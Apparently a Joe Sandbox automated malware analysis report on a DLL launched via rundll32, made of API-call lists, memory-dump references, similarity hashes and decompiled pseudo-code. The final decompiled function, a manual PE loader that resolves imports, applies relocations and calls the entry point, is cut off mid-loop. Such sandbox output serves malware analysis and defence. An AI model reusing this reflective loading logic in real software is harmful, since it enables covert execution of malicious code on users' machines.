                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _snprintfqsort
                                                                                                                                                                                                                • String ID: %I64d$false$null$true
                                                                                                                                                                                                                • API String ID: 756996078-4285102228
                                                                                                                                                                                                                • Opcode ID: 58f23407bd26eee7a2894696c6464957577155679522b91e5bdae1fe44fed9b8
                                                                                                                                                                                                                • Instruction ID: 6ab0388892a03626c6ba9818edcedb4f868e89afd272a7049aaf2efd7bcae5db
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58f23407bd26eee7a2894696c6464957577155679522b91e5bdae1fe44fed9b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53E149B550420ABFEF11DE64CC82EAF3BA9EF45394F108419FE149E181E631D9F19BA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Scre_fullinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3112101106-0
                                                                                                                                                                                                                • Opcode ID: 6dcebc9b637d95a7c3c00b674dbc11df12d7e4a94ef838fc4549ba4ba70972a7
                                                                                                                                                                                                                • Instruction ID: d01181398fbdb300edae4c99a541ba18f80170732bc52e9bc19656bce0c56a82
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6dcebc9b637d95a7c3c00b674dbc11df12d7e4a94ef838fc4549ba4ba70972a7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6519F74A04209DFCB10DFA8C985AAEBBF1BF48344F108529E854EB354E335A955CF91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(?,?,?,693412E0,?,?,?,?,?,?,693413A3), ref: 69341057
                                                                                                                                                                                                                • _amsg_exit.MSVCRT ref: 69341085
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep_amsg_exit
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1015461914-0
                                                                                                                                                                                                                • Opcode ID: f9b4f6d0b30007e82f9b2dcb04df29e04556d41dbf668b3bd9aab9173f648a1d
                                                                                                                                                                                                                • Instruction ID: fe10e7d6ec79cb2727974a487930bd28d32519eb45b7cfcc6c01c376984925dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9b4f6d0b30007e82f9b2dcb04df29e04556d41dbf668b3bd9aab9173f648a1d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3141A7B16187408FEB00EF9DD68171B77E8FBA2B44F52462DD4648B244D77AC4A1CB93
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                			E1000B07D(WCHAR* __ecx) {
                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                				WCHAR* _v12;
                                                                                                                                                                                                                				WCHAR* _v16;
                                                                                                                                                                                                                				WCHAR* _v140;
                                                                                                                                                                                                                				WCHAR* _v144;
                                                                                                                                                                                                                				short _v664;
                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                				signed int _t30;
                                                                                                                                                                                                                				WCHAR* _t36;
                                                                                                                                                                                                                				int _t40;
                                                                                                                                                                                                                				signed int _t41;
                                                                                                                                                                                                                				int _t44;
                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                				WCHAR* _t49;
                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                				WCHAR* _t52;
                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                				_v16 = __ecx;
                                                                                                                                                                                                                				_t51 = 0;
                                                                                                                                                                                                                				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                                                                				_t44 = _v8;
                                                                                                                                                                                                                				_t41 = 0;
                                                                                                                                                                                                                				_v12 = _t28;
                                                                                                                                                                                                                				if(_t44 <= 0) {
                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                                                                					__eflags = _t29;
                                                                                                                                                                                                                					return _t29;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                					L1:
                                                                                                                                                                                                                					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                                                                					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                                                                					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                                                                						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                                                                						_t40 = lstrlenW(_t49);
                                                                                                                                                                                                                						_t45 = 0;
                                                                                                                                                                                                                						if(_t40 <= 0) {
                                                                                                                                                                                                                							L11:
                                                                                                                                                                                                                							_t44 = _v8;
                                                                                                                                                                                                                							_t51 = _t51 + 1;
                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                                                                								_t49[_t45] = 0;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t45 = _t45 + 1;
                                                                                                                                                                                                                						} while (_t45 < _t40);
                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                					_t28 = _v12;
                                                                                                                                                                                                                					_t41 = _t41 + 1;
                                                                                                                                                                                                                				} while (_t41 < _t44);
                                                                                                                                                                                                                				if(_t51 != 1) {
                                                                                                                                                                                                                					if(__eflags <= 0) {
                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t52 = _v140;
                                                                                                                                                                                                                					L17:
                                                                                                                                                                                                                					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                                                                						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                						_push(_t52);
                                                                                                                                                                                                                						_push("\\");
                                                                                                                                                                                                                						_t36 = E10009DC8( &_v664);
                                                                                                                                                                                                                						_v12 = _t36;
                                                                                                                                                                                                                						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                                                                						E1000953B( &_v12, 0xfffffffe);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t52 = _v144;
                                                                                                                                                                                                                				goto L17;
                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                0x1000b086
                                                                                                                                                                                                                0x1000b08d
                                                                                                                                                                                                                0x1000b090
                                                                                                                                                                                                                0x1000b09d
                                                                                                                                                                                                                0x1000b0a3
                                                                                                                                                                                                                0x1000b0a6
                                                                                                                                                                                                                0x1000b0a8
                                                                                                                                                                                                                0x1000b0ad
                                                                                                                                                                                                                0x1000b185
                                                                                                                                                                                                                0x1000b185
                                                                                                                                                                                                                0x1000b185
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000b0b3
                                                                                                                                                                                                                0x1000b0b3
                                                                                                                                                                                                                0x1000b0b3
                                                                                                                                                                                                                0x1000b0b6
                                                                                                                                                                                                                0x1000b0bc
                                                                                                                                                                                                                0x1000b0d8
                                                                                                                                                                                                                0x1000b0df
                                                                                                                                                                                                                0x1000b0e5
                                                                                                                                                                                                                0x1000b0e9
                                                                                                                                                                                                                0x1000b0fd
                                                                                                                                                                                                                0x1000b0fd
                                                                                                                                                                                                                0x1000b100
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000b0eb
                                                                                                                                                                                                                0x1000b0eb
                                                                                                                                                                                                                0x1000b0f0
                                                                                                                                                                                                                0x1000b0f4
                                                                                                                                                                                                                0x1000b0f4
                                                                                                                                                                                                                0x1000b0f8
                                                                                                                                                                                                                0x1000b0f9
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000b0eb
                                                                                                                                                                                                                0x1000b101
                                                                                                                                                                                                                0x1000b101
                                                                                                                                                                                                                0x1000b104
                                                                                                                                                                                                                0x1000b105
                                                                                                                                                                                                                0x1000b10c
                                                                                                                                                                                                                0x1000b116
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000b118
                                                                                                                                                                                                                0x1000b11e
                                                                                                                                                                                                                0x1000b122
                                                                                                                                                                                                                0x1000b17b
                                                                                                                                                                                                                0x1000b12b
                                                                                                                                                                                                                0x1000b138
                                                                                                                                                                                                                0x1000b13e
                                                                                                                                                                                                                0x1000b140
                                                                                                                                                                                                                0x1000b147
                                                                                                                                                                                                                0x1000b14d
                                                                                                                                                                                                                0x1000b155
                                                                                                                                                                                                                0x1000b15d
                                                                                                                                                                                                                0x1000b169
                                                                                                                                                                                                                0x1000b16f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000b181
                                                                                                                                                                                                                0x1000b10e
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 1000B092
                                                                                                                                                                                                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000B09D
                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 1000B0DF
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000B138
                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 1000B15D
                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000104), ref: 1000B17B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1259063344-0
                                                                                                                                                                                                                • Opcode ID: 674de03f7284a0a6e09ea563e48131a4c2cb913a3190575a73f7948faaa34436
                                                                                                                                                                                                                • Instruction ID: 6040b5f80791b44e58dcf4f25a74dd89cab7fcefb426b9fe502b13d349ab77a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 674de03f7284a0a6e09ea563e48131a4c2cb913a3190575a73f7948faaa34436
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D31E171D00516BBFB20EF94CC94AEEB7F8EF05390F518559E412E3054EB709AC18B50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000DBDC
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 1000DBE4
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000DBF8
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000DC73
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000DC76
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000DC7B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                • Opcode ID: 9e9d9e0d3d7b8979127c60d1f401c69ad389860a69b845eb569b7036a2d8c55e
                                                                                                                                                                                                                • Instruction ID: 5154142f606cb33e32ed2096994121df708758d659f1894e466c11fc5810634a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e9d9e0d3d7b8979127c60d1f401c69ad389860a69b845eb569b7036a2d8c55e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A211D75E00219BFEB00DFA5CC88D9FBBBCEF49694B10449AF505E7250DA71AE41CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Scre_fullinfomemset
                                                                                                                                                                                                                • String ID: $ERCP
                                                                                                                                                                                                                • API String ID: 1073896759-4058133170
                                                                                                                                                                                                                • Opcode ID: b582e281489c2d5cf5d12ce119fd34363468adf4fafc54460c0903d6a961ab46
                                                                                                                                                                                                                • Instruction ID: 460c783e213dd51e12951c5fd4a79c46cdab34686178c6fd61c75c312007e044
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b582e281489c2d5cf5d12ce119fd34363468adf4fafc54460c0903d6a961ab46
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EB16BB4A043098FDB50CF99C685B9EBBF0FB48314F118559E858AB351D339E941CF65
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 20%
                                                                                                                                                                                                                			E10014DFC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                                                                				signed int _v5;
                                                                                                                                                                                                                				signed short _v12;
                                                                                                                                                                                                                				intOrPtr* _v16;
                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                				signed int* _v24;
                                                                                                                                                                                                                				unsigned int _v28;
                                                                                                                                                                                                                				signed short* _v32;
                                                                                                                                                                                                                				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                                				intOrPtr* _v48;
                                                                                                                                                                                                                				signed short* _v52;
                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                				unsigned int _v60;
                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                				_Unknown_base(*)()* _v68;
                                                                                                                                                                                                                				signed int _v72;
                                                                                                                                                                                                                				intOrPtr _v76;
                                                                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                                                                				intOrPtr _v84;
                                                                                                                                                                                                                				unsigned int _v88;
                                                                                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                                                                                				signed int _v96;
                                                                                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                                                                                				CHAR* _v116;
                                                                                                                                                                                                                				signed int _v120;
                                                                                                                                                                                                                				intOrPtr _v124;
                                                                                                                                                                                                                				signed int _v128;
                                                                                                                                                                                                                				signed int _v132;
                                                                                                                                                                                                                				signed int _t216;
                                                                                                                                                                                                                				signed int _t233;
                                                                                                                                                                                                                				void* _t273;
                                                                                                                                                                                                                				signed int _t278;
                                                                                                                                                                                                                				signed int _t280;
                                                                                                                                                                                                                				intOrPtr _t320;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                                				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                                                				_v20 = _v84;
                                                                                                                                                                                                                				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                                                                				_v64 = _t320;
                                                                                                                                                                                                                				if(_t320 == 0) {
                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                					while(0 != 0) {
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_push(8);
                                                                                                                                                                                                                					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                                                                						L35:
                                                                                                                                                                                                                						if(_a16 == 0) {
                                                                                                                                                                                                                							L54:
                                                                                                                                                                                                                							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                                                                							while(0 != 0) {
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							if(_a12 != 0) {
                                                                                                                                                                                                                								 *_a12 = _v80;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                                                                							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                                                                							while(0 != 0) {
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							if(_v124 != 0) {
                                                                                                                                                                                                                								if(_v44 == 0) {
                                                                                                                                                                                                                									L77:
                                                                                                                                                                                                                									return 1;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								if(_a20 != 1) {
                                                                                                                                                                                                                									if(_a20 != 2) {
                                                                                                                                                                                                                										L75:
                                                                                                                                                                                                                										while(0 != 0) {
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										goto L77;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									while(0 != 0) {
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_v132 = _v44;
                                                                                                                                                                                                                									goto L75;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								while(0 != 0) {
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_v44();
                                                                                                                                                                                                                								goto L75;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							while(0 != 0) {
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							return 0;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						while(0 != 0) {
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_push(8);
                                                                                                                                                                                                                						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                                                                							goto L54;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_v128 = 0x80000000;
                                                                                                                                                                                                                						_t216 = 8;
                                                                                                                                                                                                                						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
                                                                                                                                                                                                                						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                                                                						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                                                                						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                                                                						while(0 != 0) {
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                						while(_v40 < _v104) {
                                                                                                                                                                                                                							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                                                                							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                                                                							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                                                                								_v40 = _v40 + 1;
                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							while(0 != 0) {
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_v44 = _v120;
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						if(_v44 != 0) {
                                                                                                                                                                                                                							goto L54;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						while(0 != 0) {
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						return 0xffffffff;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_v96 = 0x80000000;
                                                                                                                                                                                                                					_t233 = 8;
                                                                                                                                                                                                                					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
                                                                                                                                                                                                                					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                                                                						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                                                						if(_v36 == 0) {
                                                                                                                                                                                                                							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						if(_v36 != 0) {
                                                                                                                                                                                                                							if( *_v16 == 0) {
                                                                                                                                                                                                                								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								_v24 =  *_v16 + _a4;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_v72 = _v72 & 0x00000000;
                                                                                                                                                                                                                							while( *_v24 != 0) {
                                                                                                                                                                                                                								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                                                                									_v100 =  *_v24 + _a4;
                                                                                                                                                                                                                									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                                                                									 *_v24 = _v68;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_v24 =  &(_v24[1]);
                                                                                                                                                                                                                								_v72 = _v72 + 4;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_v16 = _v16 + 0x14;
                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							_t273 = 0xfffffffd;
                                                                                                                                                                                                                							return _t273;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L35;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t278 = 8;
                                                                                                                                                                                                                				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
                                                                                                                                                                                                                				_t280 = 8;
                                                                                                                                                                                                                				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
                                                                                                                                                                                                                				while(0 != 0) {
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				while(_v56 > 0) {
                                                                                                                                                                                                                					_v28 = _v52[2];
                                                                                                                                                                                                                					_v56 = _v56 - _v28;
                                                                                                                                                                                                                					_v28 = _v28 - 8;
                                                                                                                                                                                                                					_v28 = _v28 >> 1;
                                                                                                                                                                                                                					_v32 =  &(_v52[4]);
                                                                                                                                                                                                                					_v92 = _a4 +  *_v52;
                                                                                                                                                                                                                					_v60 = _v28;
                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                						_v88 = _v60;
                                                                                                                                                                                                                						_v60 = _v60 - 1;
                                                                                                                                                                                                                						if(_v88 == 0) {
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                                                                						_v12 =  *_v32 & 0xfff;
